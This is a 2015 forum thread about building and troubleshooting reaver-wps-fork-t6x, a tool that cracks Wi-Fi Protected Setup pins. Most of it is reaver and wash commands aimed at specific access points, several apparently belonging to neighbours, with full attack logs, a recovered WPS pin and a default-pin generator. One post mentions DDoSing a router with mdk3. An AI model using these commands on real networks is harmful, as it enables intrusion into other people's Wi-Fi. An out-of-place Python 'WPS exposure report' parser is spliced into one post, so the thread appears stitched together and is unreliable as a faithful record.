[Pixie-Dust] PSK1: b5:33:92:d2:5f:d2:d3:4a:ae:cb:81:db:c9:f6:63:a6
[Pixie-Dust] PSK2: bb:f8:7f:74:54:1c:8b:74:e8:2a:3f:d3:c2:57:4e:36
[Pixie-Dust] [+] WPS pin: 50..........
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin, wait ...
Cmd : reaver -i wlan3mon -b 8C:09:F4:.......:00 -c 9 -s y -p 50..........

[Reaver Test] BSSID: 8C:09:00:11:00:11
[Reaver Test] Channel: 9
It hangs there.

t6_x
2015-04-15, 08:19
nuroo

Try with a fixed channel. Reaver is trying to get the PSK, but if reaver is not able to complete the task it stays in this loop until it gets it; if the router is far away it is difficult for reaver to get up to the final stage.

Better that I put in a timeout; tomorrow I will make the bug fix.


And sorry for the credits hahaha

It would be good if it already tried all the Ks; I'll think of something.

thank you again

t6_x
2015-04-15, 08:24
Option -g released in wash


-g, --get-chipset Output Piped and tries to read the chipset with reaver

Example


# wash -i mon0 -g -c 2
XX:XX:XX:XX:XX:XX| 1|-68|1.0|No |AAA| D-Link| DIR-615
XX:XX:XX:XX:XX:XX| 1|-58|1.0|No |CCC| ASUSTeK Computer Inc.| RT-N56U

SubZero5
2015-04-15, 10:49
Another idea... have all the extra stuff print only with verbosity mode selected :D
-v -vv -vvv maybe? :)


Update: I'm getting a segmentation fault when I use -K 1 and -K 3


Segmentation fault
I also receive a segmentation fault error...

t6_x
2015-04-15, 11:15
-v -vv -vvv maybe? :)


I also receive segmentation fault error too...

Any router? Or some router in specific?

Quest
2015-04-15, 12:39
Thx t6x!


-v -vv -vvv maby? :)

yesss. That. Keep different functions/improvement separated.

nuroo
2015-04-15, 15:18
In my original reaver command, I did not specify a channel on purpose, to troubleshoot. But your code for reaver part 2 (passphrase) sets the channel automatically. NICE!
[Pixie-Dust] PSK2: bb:f8:7f:74:54:1c:8b:74:e8:2a:3f:d3:c2:57:4e:36
[Pixie-Dust] [+] WPS pin: 50..........
[Pixie-Dust]
[Pixie-Dust] Time taken: 0 s
[Pixie-Dust]
Running the reaver with the correct pin, wait ...
Cmd : reaver -i wlan3mon -b 8C:09:F4:.......:00 -c 9 -s y -p 50..........

[Reaver Test] BSSID: 8C:09:00:11:00:11
[Reaver Test] Channel: 9

I guess the AP is just too far away like you said.

The -g option in wash for the chipset is an excellent idea. Better for picking targets. Can't wait to try it later.

popthattif
2015-04-15, 19:51
Is this version of reaver compatible with WPS version 00? Because I tried this on a TP-LINK TD-W8961ND and it always gets stuck in M2 after getting PKr, and WPS gets disabled; I have to DDoS the router with mdk3 to activate WPS again.

popthattif
2015-04-15, 22:11
It's weird, I got the same PKr when I tried Reaver on the TP-LINK TD-W8961ND; the only problem is Reaver always gets stuck at M2, so I didn't get the AuthKey, E-Hash1 and E-Hash2.

nuroo
2015-04-15, 22:15
I love the -g option. Just tried it. This is a great idea.

You're right, it does need a timer and/or an RSSI strength filter.

Or maybe make each access point an independent process so wash can move on to the next AP, and maybe display something like waiting...... until a response is received. (But I'm not a coder, maybe too much work.)

00:00:00:00:B6:A0| 6|-48|1.0|No |We hear you walking upstairs| Cisco| 123456
00:00:00:00:AD:00| 6|-47|1.0|No |TommyAndy4E| Waiting for Response..........
00:00:00:00:37:56| 6|-56|1.0|No |100 Kane| Belkin International Inc.| RE6500
00:00:00:00:8F:80| 6|-63|1.0|No |DG1670A82| Celeno Communication, Inc.| CL1800
00:00:00:00:62:6C| 6|-50|1.0|No |Kirinyaga| NETGEAR, Inc.| Waiting for Response..........


Also, does the -P option have no header on purpose, so it can be small in the terminal window?

BSSID Channel RSSI WPS Version WPS Locked ESSID
-------------------------------------------------------------------------------------------

t6_x
2015-04-15, 22:55
This can be done, but I have to think of a more general way to create the function a little better.

There are certain things that run on Linux but do not work on an embedded device; I will try to come up with something that works well.

I tried to add this option to reduce the search time, but this problem of it taking too long is annoying too.

What complicates the operation is that it is necessary to make requests to the router so that it responds with all the necessary data.

When the router is far away, it takes a while just to get as far as the M1 message, and sometimes it does not even pass the authentication; it is because of this that it is stopped on the screen waiting.

At this point it would be interesting to create multithreaded functions, but it must be done in a way that works on all devices; it would not be interesting to rework the code for each platform.

DataHead thinks that soon he will make it portable to big-endian and thus leave it open for OpenWRT and variants.


With regard to the header, I tried to create this function to help people who create scripts or frontends; it is easier to handle a result that is already relatively more processed.


There comes a time when it is difficult to decide what to do; there are many options and many variations.

Have to remember that everyone is free to help.
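Since the header-less piped format exists for scripts and frontends, here is a parser for it, added to this thread as an example; it is not code from the reaver-wps-fork-t6x project. The column order (BSSID, channel, RSSI, WPS version, WPS locked, ESSID, then manufacturer and model with -g, or a "Waiting for Response" placeholder) is taken from the rows and the -P header quoted above; the sample rows, the WashRecord type and the wps_exposure_report function are my own constructions, and the parser assumes ESSIDs contain no "|". The report is the auditor's use of a wash scan: an inventory of APs that still advertise WPS, with the unlocked ones being the list on which WPS should be switched off.

```python
"""Parser for the header-less, pipe-delimited rows printed by `wash -P` / `wash -g`.

Added example for this thread, not code from the reaver-wps-fork-t6x project.
Column order follows the -P header quoted in the thread:
  BSSID | Channel | RSSI | WPS Version | WPS Locked | ESSID [| Manufacturer | Model]
Assumption: ESSIDs contain no '|' character.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# -g prints this placeholder until the AP has answered the chipset probe.
WAITING_MARKER = "Waiting for Response"
# Accepts real MACs and the XX:XX:... masking used in the thread's samples.
MAC_RE = re.compile(r"^(?:[0-9A-Fa-fXx]{2}:){5}[0-9A-Fa-fXx]{2}$")


@dataclass
class WashRecord:
    bssid: str
    channel: int
    rssi: int                            # dBm, as printed by wash
    wps_version: str
    wps_locked: bool
    essid: str
    manufacturer: Optional[str] = None   # only filled in by -g
    model: Optional[str] = None          # only filled in by -g


def _known(field: Optional[str]) -> Optional[str]:
    """Map a missing or still-pending -g column to None."""
    if field is None or field.startswith(WAITING_MARKER):
        return None
    return field


def parse_wash_line(line: str) -> Optional[WashRecord]:
    """Parse one piped row; return None for blank lines and non-row text (e.g. a header)."""
    parts = [p.strip() for p in line.strip().split("|")]
    if len(parts) < 6 or not MAC_RE.match(parts[0]):
        return None
    try:
        channel, rssi = int(parts[1]), int(parts[2])
    except ValueError:
        return None
    return WashRecord(
        bssid=parts[0].upper(),
        channel=channel,
        rssi=rssi,
        wps_version=parts[3],
        wps_locked=parts[4].lower().startswith("yes"),
        essid=parts[5],
        manufacturer=_known(parts[6] if len(parts) > 6 else None),
        model=_known(parts[7] if len(parts) > 7 else None),
    )


def parse_wash_output(text: str) -> List[WashRecord]:
    """Parse a whole capture of piped wash output, skipping anything that is not a row."""
    return [rec for rec in map(parse_wash_line, text.splitlines()) if rec is not None]


def _by_channel(rec: WashRecord):
    return (rec.channel, rec.bssid)


def wps_exposure_report(records: List[WashRecord]) -> Tuple[List[WashRecord], List[WashRecord]]:
    """Auditor's view of a scan: which APs still advertise WPS.

    Repeated sightings of one BSSID are collapsed to the strongest reading.
    Returns (unlocked, locked): the unlocked list is the remediation list
    (WPS should be switched off there); locked APs are reported separately.
    """
    strongest: Dict[str, WashRecord] = {}
    for rec in records:
        if rec.bssid not in strongest or rec.rssi > strongest[rec.bssid].rssi:
            strongest[rec.bssid] = rec
    unlocked = sorted((r for r in strongest.values() if not r.wps_locked), key=_by_channel)
    locked = sorted((r for r in strongest.values() if r.wps_locked), key=_by_channel)
    return unlocked, locked


# Constructed sample rows in the shape of the thread's output (not real scans).
SAMPLE_WASH_P = """\
00:11:22:33:44:01| 1|-60|1.0|Yes|DG1600000
00:11:22:33:44:02| 1|-55|1.0|No |Kirin00000
00:11:22:33:44:02| 1|-50|1.0|No |Kirin00000
00:11:22:33:44:03|11|-41|1.0|No |DVW0000000
"""
SAMPLE_WASH_G = """\
00:11:22:33:44:10| 6|-48|1.0|No |Lab-AP-1| Cisco| 123456
00:11:22:33:44:11| 6|-47|1.0|No |Lab-AP-2| Waiting for Response..........
00:11:22:33:44:12| 6|-50|1.0|Yes|Lab-AP-3| NETGEAR, Inc.| Waiting for Response..........
"""

if __name__ == "__main__":
    unlocked, locked = wps_exposure_report(parse_wash_output(SAMPLE_WASH_P + SAMPLE_WASH_G))
    print("WPS enabled and unlocked (disable WPS here):")
    for r in unlocked:
        print(f"  ch{r.channel:>2} {r.bssid} {r.rssi:>4} dBm {r.essid} {r.manufacturer or ''} {r.model or ''}")
    print("WPS locked:")
    for r in locked:
        print(f"  ch{r.channel:>2} {r.bssid} {r.rssi:>4} dBm {r.essid}")
```

In practice the input is the saved terminal output of `wash -i <iface> -P` or `-g`; because rows carry no header, the MAC check on the first column is what separates rows from stray text, and the "Waiting for Response" placeholder is normalised to None so a frontend does not mistake it for a vendor name.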

nuroo
2015-04-15, 23:32
Yep ideas are the easy part.
<////////#~~~~~~

slmafiq
2015-04-16, 19:05
http://www48.zippyshare.com/v/fac5FdEV/file.html



http://www48.zippyshare.com/v/aJAXnDmL/file.html
TP link :@

t6_x
2015-04-16, 20:24
New update

reaver -W option


-W, --generate-pin Default Pin Generator by devttys0 team [1] Belkin [2] D-Link


Example



[P] E-Nonce: 27:63:ad:1f:d1:10:.......
[P] PKE: 2f:4e:e4:10:dd:0b:0e:7e:1e:27:b9:......
[P] WPS Manufacturer: D-Link
[P] WPS Model Number: ....
[P] WPS Model Serial Number: ......
[Pin Gen] D-Link Default Pin Generator by devttys0 team
[Pin Gen] Pin Generated : 25657371

WaLkZ
2015-04-16, 21:22
Do you know something about the bug with this pin 99985677 repeating? I tried to brute-force one D-LINK 501 but with this bug I can't. I see that other users have the same bug.

https://code.google.com/p/reaver-wps/issues/detail?id=614

t6_x
2015-04-16, 21:28
Paste the reaver result

WaLkZ
2015-04-16, 21:35
Which result? You want the result with hashes? I mention the bug because you updated reaver with new things and ...

t6_x
2015-04-16, 21:45
Which result? You want the result with hashes? I mention the bug because you updated reaver with new things and ...

From the link that you gave me it is not clear what is happening.

It is hard for me to analyze the problem without having a router that has this defect. Did you try to work with the options -1 and -2 to set the pin at a different position?

WaLkZ
2015-04-16, 21:54
No. I tried 3-4 months ago with the classic method: collecting pins. https://www.google.bg/#q=99985677+pin+loop

iliass
2015-04-17, 10:11
Please, if possible, give us a method to add more routers, and thanks.

fbs-16
2015-04-17, 20:16
Hello!
I've just tried the -W option with a TP-Link router and it gives me a pin:

root@root:~# reaver -i mon0 -b F8:D1:11:46:60:92 -c 6 -S -vv -W2

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead

[+] Switching mon0 to channel 6
[?] Restore previous session for F8:D1:11:46:60:92? [n/Y] n
[+] Waiting for beacon from F8:D1:11:46:60:92
[+] Associated with F8:D1:11:46:60:92 (ESSID: TP-LINK_23)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 7e:4b:d4:27:6f:5b:1b:96:92:68:ab:da:0c:0d:c1:04
[P] PKE: 30:f4:ec:68:2c:eb:11:63:91:96:11:c9:84:b1:8b:4b:9b :72:44:47:c9:14:6a:52:04:c3:a5:eb:8d:73:0c:6b:e0:4 6:2f:09:84:89:64:95:a8:40:e5:61:68:d9:6f:86:13:a1: 6d:a9:e0:65:08:40:2a:4e:79:b2:3d:fe:2e:09:e3:f0:de :02:bc:0e:01:21:37:15:22:c6:58:df:50:59:ae:ba:4b:2 8:cc:c3:ca:c8:67:9a:6b:1b:1b:a5:c8:2c:0e:0c:10:d6: fb:03:8d:5a:55:8c:57:e3:f8:b9:06:5c:af:c5:0b:47:8b :68:e5:6b:ba:3b:e4:a6:a0:5a:2b:6f:69:a3:7b:14:99:3 0:da:96:a6:23:fc:6e:9f:a7:5d:bc:43:2d:00:75:38:b4: 3e:04:69:6f:25:0a:fb:a0:fd:04:46:a4:ed:f8:2e:f5:b6 :e5:82:6c:08:5c:8b:b0:ea:da:6d:96:3b:af:40:ec:c2:8 0:87:d4:36:e7:5d:43:1e:de
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 4.0
[P] WPS Model Serial Number: 1.0
[Pin Gen] D-Link Default Pin Generator by devttys0 team
[Pin Gen] Pin Generated : 66021674

But this pin is wrong :(


root@root:~# reaver -i mon0 -b F8:D1:11:46:60:92 -c 6 -S -vv -p 66021674

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead

[+] Switching mon0 to channel 6
[+] Waiting for beacon from F8:D1:11:46:60:92
[+] Associated with F8:D1:11:46:60:92 (ESSID: TP-LINK_23)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin 66021674.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 03:15:f3:fd:c4:d0:28:66:d9:b5:44:89:18:5d:76:90
[P] PKE: fe:b2:9b:4c:0f:f0:b7:93:07:49:94:cd:8e:27:e7:66:a9 :82:c5:b1:3e:57:db:10:b6:bc:7b:b5:b9:e1:a8:f1:95:2 8:79:0a:90:18:54:8e:f1:ed:9e:cf:36:c6:85:3e:16:54: 66:f5:fc:e0:a7:75:d8:f9:70:3d:99:28:a2:49:73:dc:56 :19:2b:9d:77:72:d8:47:f8:dc:d8:15:52:92:e4:3a:cd:b b:c0:c2:ff:6e:ed:a7:ed:b5:c8:3b:ee:7f:db:e2:74:7b: 48:73:9a:5d:e9:26:a8:44:6e:79:43:c4:27:31:ed:5e:3b :96:19:d1:95:8a:47:0e:7a:52:b9:72:2c:bb:44:1a:d1:1 d:4c:3f:cc:e4:d5:36:03:5f:68:65:b7:ba:c3:c3:6a:4f: a0:7a:d1:3f:32:23:2a:98:fb:11:24:e2:3b:0a:8d:29:f8 :87:87:7d:4c:30:5c:06:1d:31:41:53:71:46:5c:fc:e9:9 a:fa:1c:34:50:5b:7d:af:ec
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 4.0
[P] WPS Model Serial Number: 1.0
[+] Received M1 message
[P] PKR: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 :00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:0 0:00:00:00:00:00:00:00:02
[P] AuthKey: fa:7d:f6:ff:8d:08:af:de:0e:06:8f:c3:e6:9e:bb:b7:57 :7b:49:a8:cb:fd:e9:0f:ee:40:91:ae:94:3c:86:67
[+] Sending M2 message
[P] E-Hash1: c9:44:26:f8:b0:91:05:54:a8:e7:fb:e4:db:14:94:14:5a :c7:7b:d6:8a:dd:4c:f6:74:9c:9b:c5:86:4e:2b:23
[P] E-Hash2: 4a:3a:e9:db:9d:2d:e5:d7:6d:d9:61:df:67:b4:5f:08:99 :17:4a:0d:ca:90:e4:54:ff:60:d4:02:be:9e:fd:e8
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p2_index set to 1
[+] Pin count advanced: 10001. Max pin attempts: 11000
[+] Trying pin 66021674.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: f4:c4:53:ae:77:33:76:ca:4e:38:

For another TP-Link router, the same situation:

root@root:~# reaver -i mon0 -b 10:FE:ED:9E:C7:92 -c 11 -S -W2 -vv

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead

[+] Switching mon0 to channel 11
[+] Waiting for beacon from 10:FE:ED:9E:C7:92
[+] Associated with 10:FE:ED:9E:C7:92 (ESSID: TP-LINK_9EC792)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: e9:d9:8c:79:f4:66:03:df:31:b3:c7:b0:da:2d:ad:42
[P] PKE: 5f:3e:5a:21:2f:ad:2b:49:d9:bf:52:1a:eb:e4:a0:b9:f6 :57:30:8e:58:12:d0:57:45:70:b3:d6:d5:87:43:a0:82:4 e:5d:c1:46:d7:3f:86:54:b9:fe:c3:5a:c2:08:cc:a2:94: c5:ef:72:4b:0e:b9:d7:20:85:cc:60:72:34:35:10:41:8d :c0:46:4b:cd:13:a5:ce:66:b7:b8:e6:62:3a:af:3f:bc:c d:d4:5d:4e:8d:01:2c:16:fc:20:0c:d0:3a:93:e5:ef:dd: a9:f8:37:83:6b:08:6e:c8:60:92:be:68:14:e9:bd:a5:21 :fa:80:ef:4c:cd:64:f4:6d:ee:59:98:f2:4f:fa:83:77:2 9:38:27:21:7f:12:00:89:f8:9e:f7:c4:81:83:5e:e8:e5: 50:8d:07:b9:3b:f1:e5:84:a9:d0:35:8e:aa:ad:d8:aa:08 :10:94:ba:2d:93:88:e9:95:ef:f4:d4:22:a2:f5:bb:fd:b 3:f1:40:dc:c9:fc:0c:ce:eb
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 4.0
[P] WPS Model Serial Number: 1.0
[Pin Gen] D-Link Default Pin Generator by devttys0 team
[Pin Gen] Pin Generated : 23276079

root@root:~# reaver -i mon0 -b 10:FE:ED:9E:C7:92 -c 11 -W2 -vv

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead

[+] Switching mon0 to channel 11
[+] Waiting for beacon from 10:FE:ED:9E:C7:92
[+] Associated with 10:FE:ED:9E:C7:92 (ESSID: TP-LINK_9EC792)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 77:b4:31:9b:fa:fd:7c:69:18:2d:d6:67:61:67:39:d7
[P] PKE: 81:a3:87:a9:28:b7:7c:31:e9:bf:84:60:a0:33:2c:45:5a :aa:d2:9c:91:4c:64:cf:da:90:3b:97:21:84:9d:d5:d2:4 d:f6:df:68:73:ab:09:70:e4:d8:3c:0e:3b:75:c8:39:5a: 60:ba:bd:2e:19:88:cf:cb:8a:ba:50:62:55:51:6b:b9:79 :95:29:87:fc:5c:68:7f:ef:ba:d5:58:8a:2f:e3:b7:0e:d c:86:52:f6:45:7d:1a:f7:dc:ee:02:25:1a:1e:89:1c:8a: 54:6f:22:d7:10:62:14:13:6e:6a:be:bd:c4:d2:95:99:c1 :48:9d:0f:0e:17:6c:b5:ff:73:a9:bc:56:fa:4c:db:4d:c 5:da:23:3f:9a:3f:cf:a1:0b:cc:70:d1:e3:87:ab:e8:7f: 5b:14:a0:b1:60:3f:97:8d:af:c6:ea:58:0b:27:e6:20:6e :b9:ab:a1:4b:08:76:1a:33:b0:0b:65:1d:1e:20:0b:21:3 8:ab:a1:39:77:3a:c2:05:96
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 4.0
[P] WPS Model Serial Number: 1.0
[Pin Gen] D-Link Default Pin Generator by devttys0 team
[Pin Gen] Pin Generated : 23276079

root@root:~# reaver -i mon0 -b 10:FE:ED:9E:C7:92 -c 11 -p 23276079 -vv

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead

[+] Switching mon0 to channel 11
[+] Waiting for beacon from 10:FE:ED:9E:C7:92
[+] Associated with 10:FE:ED:9E:C7:92 (ESSID: TP-LINK_9EC792)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin 23276079.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: cd:0b:6e:a2:32:b5:73:f8:0a:6c:a7:db:f3:e8:b7:3d
[P] PKE: 8b:c9:c8:4b:61:5a:88:87:b3:7b:b3:5b:95:91:7c:f8:59 :11:85:b1:b7:4a:58:c9:7d:d5:c6:45:44:30:9c:b1:1c:2 e:d2:85:88:93:86:1c:21:25:e9:d5:4b:29:38:f5:76:b9: 9c:43:a4:31:fc:01:82:fb:49:18:3f:1d:0f:90:02:2b:29 :9e:24:bb:6d:b0:22:75:50:4d:52:4b:88:3e:47:7a:42:b c:6a:2d:1d:18:6c:7d:98:41:07:c8:44:6d:ee:b6:07:09: b4:9e:89:a2:48:11:2f:d4:ac:aa:be:bc:f4:10:b0:db:f5 :ac:fe:0c:3f:20:62:63:d7:f4:82:61:4e:8a:6d:63:53:b b:63:fa:f6:3b:f3:6d:97:e9:8a:9a:21:35:e4:96:09:ae: 5b:db:79:15:49:bb:aa:f0:71:fc:91:b4:58:82:4c:07:95 :7e:5e:c8:d3:e7:d2:c1:d9:3f:3f:19:9e:b1:4d:b0:a2:e a:af:9d:6f:b1:97:ac:b5:a4
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 4.0
[P] WPS Model Serial Number: 1.0
[+] Received M1 message
[P] PKR: c7:2f:8a:a2:10:12:d9:d2:05:61:3c:a6:7a:20:80:b3:56 :20:39:d9:a3:d7:a3:69:8a:c9:90:d3:6b:da:b4:8b:3e:a f:6e:02:3b:7d:b6:99:8c:d1:48:c5:28:62:36:b1:c3:86: ef:75:95:ed:81:f4:f7:4f:8e:d8:b8:88:9c:f9:fe:fa:14 :da:52:9d:a4:08:1a:c1:e6:ad:e6:e2:85:2d:e5:fc:e6:e f:8f:ae:05:02:b5:34:d2:4e:01:ff:49:01:c6:db:56:75: f7:05:9d:e1:22:f9:63:03:a5:2e:5e:da:e9:45:fe:6d:1b :b5:dc:a3:4b:93:9c:c8:63:44:9b:8e:7f:18:2a:21:df:b c:b9:a6:b2:42:ae:42:ca:89:59:f3:c5:c4:26:ed:b9:c5: 95:d5:5e:26:be:8f:ae:b6:8c:09:8f:32:68:a5:b7:c3:50 :fb:72:57:e4:db:99:57:ca:5b:e6:5e:82:94:7e:46:31:d b:ac:70:33:36:a7:70:f1:cc
[P] AuthKey: ce:03:54:4f:95:88:fd:73:eb:95:00:8d:3e:d6:4f:2d:f3 :c8:55:69:84:c3:b6:25:6e:c5:4d:38:b4:7d:b6:eb
[+] Sending M2 message
[P] E-Hash1: 31:59:76:88:83:d2:4d:62:7d:9b:6c:f8:2d:d7:0a:66:31 :ae:ed:a5:ca:de:5f:d1:17:ef:7a:a2:f0:4c:47:24
[P] E-Hash2: 34:c6:ed:b1:2d:bf:07:ab:a2:4b:2d:2c:2d:5f:73:98:95 :06:30:96:eb:eb:16:79:ef:a2:1f:10:79:c8:63:32
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] p2_index set to 1
[+] Pin count advanced: 10001. Max pin attempts: 11000
[+] Trying pin 23276079.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response

So, what is wrong? Maybe I'm using the -W option incorrectly?

soxrok2212
2015-04-17, 21:15
Hello
So, what is wrong? Maybe I'm using the -W option incorrectly?

Well, it just might be the fact that you're using a D-Link generator for a TP-Link AP... but no, that can't be!

t6_x
2015-04-17, 21:15
[P] WPS Manufacturer: TP-LINK
[P] WPS Model Number: 4.0
[P] WPS Model Serial Number: 1.0
[Pin Gen] D-Link Default Pin Generator by devttys0 team
[Pin Gen] Pin Generated : 66021674

You realize that the -W option works for two types of routers, D-Link and Belkin, and only for some models of these companies?
You are trying to use the D-Link generator on a TP-Link router?

I think this is not being done properly.

The output itself says D-Link, please pay a little more attention.

fbs-16
2015-04-17, 22:31
Sorry, I was too obvious. Thank you for the explanation and your work! I found only 1 D-Link router but it gave me the same problem. I believe it's one of the "some models of these companies" which are protected.
I was trying both -W2 and -W1:

reaver -i mon0 -b 14:D6:4D:2D:C7:64 -c 3 -vv -S -W2

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead

[+] Switching mon0 to channel 3
[?] Restore previous session for 14:D6:4D:2D:C7:64? [n/Y] n
[+] Waiting for beacon from 14:D6:4D:2D:C7:64
[+] Associated with 14:D6:4D:2D:C7:64 (ESSID: 67248Lengen)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: e4:bc:d7:2b:75:a4:10:45:54:d4:69:98:e7:fe:a0:e6
[P] PKE: 57:09:eb:12:09:28:f1:e3:68:0f:21:fe:d8:9f:b4:15:21 :31:4e:92:b9:70:55:e1:cd:59:7c:3d:c9:fc:fc:58:68:0 a:60:9b:26:52:12:05:f5:17:c1:a7:a0:98:bf:40:f5:2e: 8f:c1:ba:3c:bc:8b:78:d4:e5:9a:74:1b:8c:72:43:e4:a4 :ed:1d:bf:00:dd:e8:39:14:c6:20:ea:57:09:8e:cc:b0:d 8:fb:02:ba:71:c1:b2:ed:0a:e2:90:f3:ef:bd:1f:5a:77: 59:58:52:83:3a:ec:6d:09:06:0f:1d:a9:0c:e2:7e:3e:91 :35:5e:55:ac:29:4e:e3:11:59:9d:62:da:e5:fb:e7:61:9 a:8d:3e:cb:d8:f1:cd:36:b2:29:91:e7:9e:46:79:9e:52: 9d:d5:77:4a:43:ab:7d:87:ad:b9:d4:c9:82:19:5f:e0:7f :5a:ee:a3:48:5d:04:43:4b:b2:05:e4:4e:e8:9d:ca:f4:1 3:6d:d4:06:1b:88:9f:2b:75
[P] WPS Manufacturer: D-Link
[P] WPS Model Number: DIR-615
[P] WPS Model Serial Number: none
[Pin Gen] D-Link Default Pin Generator by devttys0 team
[Pin Gen] Pin Generated : 69130571

root@root:~# reaver -i mon0 -b 14:D6:4D:2D:C7:64 -c 3 -vv -p 69130571

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <[email protected]>
mod by t6_x <[email protected]> & DataHead

[+] Switching mon0 to channel 3
[+] Waiting for beacon from 14:D6:4D:2D:C7:64
[+] Associated with 14:D6:4D:2D:C7:64 (ESSID: 67248Lengen)
[+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
[+] Trying pin 69130571.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 1e:80:8f:8d:00:49:27:e8:34:c8:02:f1:be:6c:17:06
[P] PKE: 21:2c:e8:59:ca:7a:60:38:b2:4e:29:6a:a3:7e:58:d2:a5 :df:89:03:a8:78:e6:27:39:1e:69:46:62:ba:af:af:d5:a 0:1d:11:36:6a:c9:02:d8:23:a5:28:b3:69:f2:39:db:5e: 2f:cc:0c:f4:81:29:64:1d:e7:f4:7f:62:c8:79:4a:dd:3b :ed:5d:e0:fd:08:66:2b:e3:02:24:3a:2d:35:48:4e:3e:d 7:af:d2:8f:18:ba:50:eb:24:e0:5a:03:82:90:69:c1:a1: af:a3:bf:1c:5d:1b:54:48:5e:5b:61:06:1a:1f:54:b5:67 :da:6a:e0:04:44:6a:f2:c0:2f:58:6d:4c:f7:a7:b3:ce:a 3:dd:d4:ca:4a:fd:e5:ad:a7:c6:c3:e9:8f:f2:9b:97:f1: f5:9e:a4:07:8c:12:fe:ea:35:47:ee:cc:4e:8f:f0:64:6c :a7:7a:c7:6a:84:0f:ea:e8:77:76:e3:89:21:ba:4f:08:5 6:33:62:78:cf:1d:6c:57:7d
[P] WPS Manufacturer: D-Link
[P] WPS Model Number: DIR-615
[P] WPS Model Serial Number: none
[+] Received M1 message
[P] PKR: ab:c9:36:63:de:53:66:02:df:77:ae:85:a1:aa:90:61:f3 :a0:7e:fd:0b:ba:68:e0:13:5b:70:10:66:46:6b:eb:26:d 3:33:43:fa:0d:82:f2:b4:88:f6:8c:02:fb:0b:07:76:5c: 06:8c:eb:36:b8:fd:7f:7e:ce:19:18:77:dd:24:e4:30:62 :42:6f:a9:27:3c:dc:8d:1f:36:5c:c1:43:e3:23:c7:ba:c 4:48:a9:c4:d8:a7:0a:64:2a:2c:0b:0d:8f:d7:5c:7f:d9: 22:f5:8c:3b:50:42:17:fe:56:71:4a:ff:75:d2:18:df:44 :0d:6f:ce:87:3c:38:77:f8:f1:09:39:8f:cc:ba:75:67:1 1:20:a2:bd:99:25:fe:62:ac:5b:9d:97:71:2f:96:7f:0e: da:44:3f:bd:62:9c:e4:53:d7:81:21:64:79:a0:46:6d:36 :18:ec:77:57:43:6d:c4:d2:d3:43:e0:38:f6:4e:ae:5c:c c:ae:4c:d6:31:a5:68:cc:84
[P] AuthKey: dc:c0:e9:e9:e2:13:b4:81:d5:92:e6:b7:b8:7e:0e:e0:29 :49:6e:eb:9a:95:7f:9e:05:92:48:3e:38:2a:86:3a
[+] Sending M2 message
[P] E-Hash1: 2c:08:61:26:58:76:5d:f6:ee:59:d9:7a:32:43:b8:f9:1f :05:3c:a4:cc:f6:22:3a:24:c8:9c:e2:ef:df:3a:52
